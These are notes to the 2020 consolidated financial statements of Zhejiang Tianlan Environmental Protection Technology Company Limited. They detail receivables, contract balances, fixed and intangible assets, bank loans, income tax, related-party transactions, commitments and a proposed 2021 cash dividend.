ZHEJIANG TIANLAN ENVIRONMENTAL PROTECTION TECHNOLOGY COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

4
Accounts receivable, net

Accounts receivable, net consisted of the following at December 31:

	2020	2019
	RMB’000	RMB’000

Contract receivables	160,803	165,262
Less: allowance for doubtful accounts	(42,182)	(26,484)

	118,621	138,778

The roll-forward of activity in the allowance for doubtful accounts was as follows for the years ended December 31:

	2020	2019
	RMB’000	RMB’000

Balance at beginning of period	26,484	24,047
Add: provision for allowances	22,161	2,437
Less: Reversal of provision for allowances	(6,463)	-

Balance at end of period	42,182	26,484

The following is an aging analysis of accounts receivable, net at December 31:

	2020	2019
	RMB’000	RMB’000

Within 1 year	76,590	96,456
1 year - 2 years	31,389	30,252
2 years - 3 years	6,128	6,260
3 years - 4 years	3,678	5,179
4 years - 5 years	836	631

	118,621	138,778

At December 31, 2020, the accounts receivable, net pledged as security for the Company’s bank loans and third party loans amounted to RMB Nil (2019: RMB11,575,000).

ZHEJIANG TIANLAN ENVIRONMENTAL PROTECTION TECHNOLOGY COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

5
Prepayments and other current assets

Prepayments and other current assets mainly represent deposits paid for bidding projects, purchases, services and finance leases and prepaid expenses.

	December 31,
	2020	2019
	RMB’000	RMB’000

Prepayments	16,632	19,962
Deposits paid for bidding projects and temporary payments	10,448	13,988
Deposits for finance leases	-	17,512
Other current assets	1,307	1,397

	28,387	52,859

6
Contract assets, net and liabilities

Contracts with customers usually stipulate the timing of payment, which is defined by the terms found within the various contracts under which work was performed during the period. Therefore, contract assets and liabilities are created when the timing of costs incurred on work performed does not coincide with the billing terms.

The Group’s consolidated balance sheets present contract assets, net which contains earned unbilled revenue associated with contract work that has been completed but not paid by customers, that are generally due once the job is completed and approved.

Contract assets, net consisted of the following at December 31:

	2020	2019
	RMB’000	RMB’000

Unbilled revenue	94,494	80,961

The Group’s consolidated balance sheets present contract liabilities which contain deferred revenue (previously identified as billings in excess of costs and estimated earnings on uncompleted contracts).

Contract liabilities consisted of the following at December 31:

	2020	2019
	RMB’000	RMB’000

Deferred revenue	47,135	55,898

ZHEJIANG TIANLAN ENVIRONMENTAL PROTECTION TECHNOLOGY COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

6
Contract assets, net and liabilities (Cont’d)

The following table provides information about contract assets, net and contract liabilities from contracts with customers at December 31:

	2020	2019
	RMB’000	RMB’000

Contract assets	94,494	80,961
Contract liabilities	(47,135)	(55,898)

Net contract assets	47,359	25,063

The difference between the opening and closing balances of the Group’s contract assets, net and contract liabilities primarily results from the timing of the Group’s billings in relation to its performance of work.

The net asset position for contracts in process consisted of the following at December 31:

	2020	2019
	RMB’000	RMB’000

Costs and estimated earnings on uncompleted contracts	406,064	433,195
Less: billings to date	(358,705)	(408,132)

	47,359	25,063

Contract assets, net consisted of the following at December 31:

	2020	2019
	RMB’000	RMB’000

Gross contract assets	102,144	80,961
Less: allowance for doubtful accounts	(7,650)	-

	94,494	80,961

7
Inventories

	December 31,
	2020	2019
	RMB’000	RMB’000

Raw materials	341	5,742
Finished goods	2,048	13

	2,389	5,755

8
Short-term and long-term investments

The Group's short-term investments consist of wealth management products and long-term investments consist of minority ownership interests in Nil (2019: one) limited liability company, generally from private equity arrangements. These investments are carried under the equity method of accounting, with changes in the carrying value reported as realized gains or losses in the consolidated financial statements.

ZHEJIANG TIANLAN ENVIRONMENTAL PROTECTION TECHNOLOGY COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

9
Property, plant and equipment

	December 31,
	2020	2019
	RMB’000	RMB’000

Building and leasehold improvements	167,874	167,874
Furniture, fixtures and office equipment	3,658	3,543
Motor vehicles	4,808	4,808
Plant and machineries	9,399	8,937

Total	185,739	185,162

Less: Accumulated depreciation and amortization	(70,241)	(63,881)
Accumulated impairment losses	(36,241)	(33,500)

Total	(106,482)	(97,381)

Net	79,257	87,781

	Year ended December 31,
	2020	2019	2018
	RMB’000	RMB’000	RMB’000

Depreciation charge	6,359	6,556	11,755

At December 31, 2020, the net book value of property, plant and equipment pledged as security for the Company’s bank loans and third party loans amounted to approximately RMB34,403,000 (2019: RMB84,598,000).

ZHEJIANG TIANLAN ENVIRONMENTAL PROTECTION TECHNOLOGY COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

10
Intangible assets, net

	December 31,
	2020	2019
	RMB’000	RMB’000

Amortizable intangible assets

Gross carrying amount
Patents	3,750	2,400
Others	165	165

	3,915	2,565

Less: Accumulated amortization	(1,795)	(1,638)

Net carrying amount	2,120	927

	Year ended December 31,
	2020	2019	2018
	RMB’000	RMB’000	RMB’000

Amortization expense	142	152	152

At December 31, 2020, estimated future intangible assets amortization expense for the each of the next five years and thereafter was as follows:

Future amortization expense
RMB’000

2021	142
2022	142
2023	142
2024	142
2025	142
Thereafter	1,410

Total	2,120

At December 31, 2019, estimated future intangible asset amortization expense for the each of the next five years and thereafter was as follows:

Future amortization expense
RMB’000

2020	152
2021	152
2022	152
2023	152
2024	152
Thereafter	167

Total	927

ZHEJIANG TIANLAN ENVIRONMENTAL PROTECTION TECHNOLOGY COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

11
Land use right, net

	December 31,
	2020	2019
	RMB’000	RMB’000
Gross carrying amount

Land use right	7,361	7,361
Less: Accumulated amortization	(2,214)	(2,070)

Net carrying amount	5,147	5,291

	Year ended December 31,
	2020	2019	2018
	RMB’000	RMB’000	RMB’000

Amortization expense	159	149	149

At December 31, 2020, the land use right pledged as security for the Company’s bank loans and third party’s loans amounted to approximately RMB4,463,000 (2019: RMB5,291,000).

Future amortization expense
RMB’000

2021	159
2022	159
2023	159
2024	159
2025	159
Thereafter	4,352

Total	5,147

At December 31, 2019, estimated future intangible asset amortization expense for the each of the next five years and thereafter was as follows:

Future amortization expense
RMB’000

2020	149
2021	149
2022	149
2023	149
2024	149
Thereafter	4,546

Total	5,291

ZHEJIANG TIANLAN ENVIRONMENTAL PROTECTION TECHNOLOGY COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

12
Bank borrowings

	December 31,
	2020	2019
	RMB’000	RMB’000

Bank loans borrowed by the Company (note i)	10,014	21,834
Bank loans borrowed by subsidiaries of the Company (note ii)	10,015	5,007
	20,029	26,841

(i)
The bank loans are denominated in Renminbi and are repayable within 1 year. The bank loans borrowed by the Company as of December 31, 2020 bears interest at fixed rates of 4.79% (2019: 4.57% to 6.33%) per annum. Interest paid during the year ended December 31, 2020 was approximately RMB1,377,000 (2019: RMB1,991,000 and 2018: RMB2,089,000).

(ii)
The bank loans are denominated in Renminbi and are repayable within 1 year. The bank loans borrowed by subsidiaries of the Company as of December 31, 2020 bears interest at a fixed rate ranging from 4.5% to 4.79% (2019: 5.22%) per annum and are secured by the subsidiary’s office premises and leasehold improvements and land use right. Interest paid during the year ended December 31, 2020 was approximately RMB287,000 (2019: RMB246,000 and 2018: RMB278,000).

13
Other payables and accrued expenses

	December 31,
	2020	2019
	RMB’000	RMB’000

Accrued expenses	7,629	5,312
Output VAT	6,529	-
Deposits received and temporary receipts	3,589	2,271

	17,747	7,583

14
Other taxes payable

Other taxes payable mainly comprise Valued-Added Tax (“VAT”). The Group is subject to output VAT levied at the rate of 3% to 13% (2019: 9% to 13%) of the revenue from sales of equipment. The input VAT paid on purchases of materials and other direct inputs can be used to offset the output VAT levied on operating revenue to determine the net VAT payable or recoverable.

ZHEJIANG TIANLAN ENVIRONMENTAL PROTECTION TECHNOLOGY COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

15
Capital reserve

Capital reserve represents capital contributions from shareholders in excess of the paid-in capital amount and capitalization of gain on disposal of subsidiaries to the shareholders in previous years .

16
Other income and other losses

Other income

	Year ended December 31,
	2020	2019	2018
	RMB’000	RMB’000	RMB’000

Compensation income	22,548	-	-
Gain on disposal of property, plant and equipment	-	39	-
Investment income	266	-	1,661
Amounts waived by payees	4,535	280	1,363
Reversal of allowance for doubtful accounts	6,463	-	-
Subsidy income from PRC government	5,834	5,957	5,537

	39,646	6,276	8,561

Other losses

	Year ended December 31,
	2020	2019	2018
	RMB’000	RMB’000	RMB’000

Bad debts written off	-	5,383	13,946
Impairment loss on contract assets	1,399	-	-
Impairment loss on long-term investments	1,340	-	-
Impairment loss on property, plant and equipment	2,742	-	33,500
Investment loss	-	241	-

	5,481	5,624	47,446

17
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

ZHEJIANG TIANLAN ENVIRONMENTAL PROTECTION TECHNOLOGY COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

17
Income tax expense/(credit) (Cont’d)

During the years ended December 31, 2020 and 2019, the PRC tax laws and regulations have launched a tax reduction scheme for small enterprises, Hangzhou Tianlan Pure Environmental Protection Technology Company Limited, Hangzhou Tiancan Environmental Technology Company Limited, Zhejiang Tianlan Environmental Engineering and Design Company Limited and Zhejiang Tianlan Environmental Protection Engineering Company Limited are entitled to enjoy this tax benefit. As such, they are subjects to Enterprise Income Tax rate of 20% only.

The Company and its subsidiaries are based in the PRC and file an EIT return. The components of the provision for income tax expense/(credit) were as follows:

	Year ended December 31,
	2020	2019	2018
	RMB’000	RMB’000	RMB’000

Current tax expense
PRC EIT	757	28	2

Income tax expense	757	28	2

Deferred tax expense/(credit)	1,101	268	(7,969)

Total deferred tax expense/(credit)	1,101	268	(7,969)

Total expense/(credit)	1,858	296	(7,967)

The items comprising the difference between income tax computed at the EIT statutory rates in effect for 2020, 2019 and 2018 and our effective tax rates were as follows:

	Year ended December 31,
	2020	2019	2018
	RMB’000	RMB’000	RMB’000

Income/(loss) before income tax	15,358	4,654	(34,194)
Computed tax using respective companies’ statutory tax rates	2,304	642	(4,987)
(Over)-provision for income tax in prior years	(48)	-	-
Temporary differences	182	202	(272)
Tax effect of revenue not subject to tax	-	-	(3,024)
Tax effect of expenses not deductible for tax purposes	2,306	693	316
Tax effect of special deduction for research and development costs	(3,001)	(2,103)	-
Others	115	862	-
Income taxes expense/(credit) at effective tax rate	1,858	296	(7,967)

ZHEJIANG TIANLAN ENVIRONMENTAL PROTECTION TECHNOLOGY COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

17
Income tax expense/(credit) (Cont’d)

The components of deferred tax assets are as follows:

	December 31,
	2020	2019
	RMB’000	RMB’000

Allowance for doubtful accounts	6,184	7,464
Deferred government grant	750	-
Impairment losses on assets	6,705	5,025
Tax losses	-	1,481

Total deferred tax assets	13,639	13,970

Uncertain tax positions

As a result of the Group’s analysis, management has determined that the Group does not have any material uncertain tax positions.

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

During the years ended December 31, 2020, 2019 and 2018, the aggregate contributions of the Group to the aforementioned pension plans and retirement benefit schemes were approximately RMB5,645,000, RMB5,449,000 and RMB4,692,000 respectively.

19
Risk factors

Financial risk factors

The Group’s activities expose it mainly to credit risk.

Credit risk

The Group has no significant concentration of credit risk, cash in banks in PRC is insured with limit of approximately RMB500,000, per bank per each depositor. Uninsured cash in banks and restricted cash balances in PRC are of approximately RMB44,494,000 (2019: RMB7,258,000). Cash transactions are limited to high credit quality banks.

ZHEJIANG TIANLAN ENVIRONMENTAL PROTECTION TECHNOLOGY COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

20
Related party transaction

There were sales of certain shareholding in a subsidiary to a shareholder of the Company with gross sale proceeds of RMB510,000 in 2019, purchase of a subsidiary from shareholders of the Company with total consideration of approximately RMB4,590,000 (2019: RMB Nil), engineering service income from an investment of approximately RMB5,779,000 (2019: RMB Nil) and remuneration to key management personnel of approximately RMB1,400,000 (2019: RMB 1,473,000).

21
Commitments and contingencies

(i)           Insurance

The Group carries insurance policies to cover various risks, primarily general liability, automobile liability, workers’ compensation and employee medical expenses under which we are liable to reimburse the insurance company for a portion of each claim paid.

(ii)          Purchase commitments

To manage the risk of changes in material prices and subcontracting costs used in tendering bids for contracts, most of the time, the Group obtains firm quotations from suppliers and subcontractors before submitting a bid. These quotations do not include any quantity guarantees. As soon as the Group is advised that its bid is successful, the Group enters into firm contracts with most of its materials suppliers and sub-contractors, thereby mitigating the risk of future price variations affecting the contract costs.

(iii)         Litigation

The Group is now and may in the future be involved as a party to various legal proceedings that are incidental to the ordinary course of business. Management, after consultation with legal counsel, does not believe that the outcome of these actions will have a material impact on the consolidated financial statements of the Group. There are no significant unresolved legal issues as of December 31, 2020 and 2019.

(v)          Contingencies

The Group accounts for loss contingencies in accordance with ASC Topic 450 and other related guidelines. As of December 31, 2020 and 2019, the Group’s management is of the opinion that there are no commitments and contingencies to account for.

(vi)         Operating leases

The Group has no operating leases expense during the year ended December 31, 2020 (2019 and 2018: RMB Nil). At December 31, 2020, the Group has no future minimum lease payments under non-cancellable operating leases.

22
Subsequent event

On April 24, 2021, the director of the Company proposed a cash dividend of an aggregate of approximately RMB13,212,000, which dividend was paid to all holders of record subject to approval in shareholders’ annual general meeting.